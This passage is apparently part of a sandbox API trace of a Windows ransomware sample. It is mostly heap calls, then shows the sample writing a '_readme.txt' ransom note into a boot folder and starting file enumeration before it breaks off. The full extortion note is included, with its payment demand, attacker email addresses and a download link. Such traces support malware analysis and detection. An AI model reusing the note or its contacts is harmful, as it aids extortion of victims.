lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.541] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0183.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.542] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.542] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.542] PathFindFileNameW (pszPath="") returned="" [0183.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.542] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.543] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.543] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.543] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.543] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0183.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.543] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0183.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.544] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.544] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.544] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.547] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.548] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: 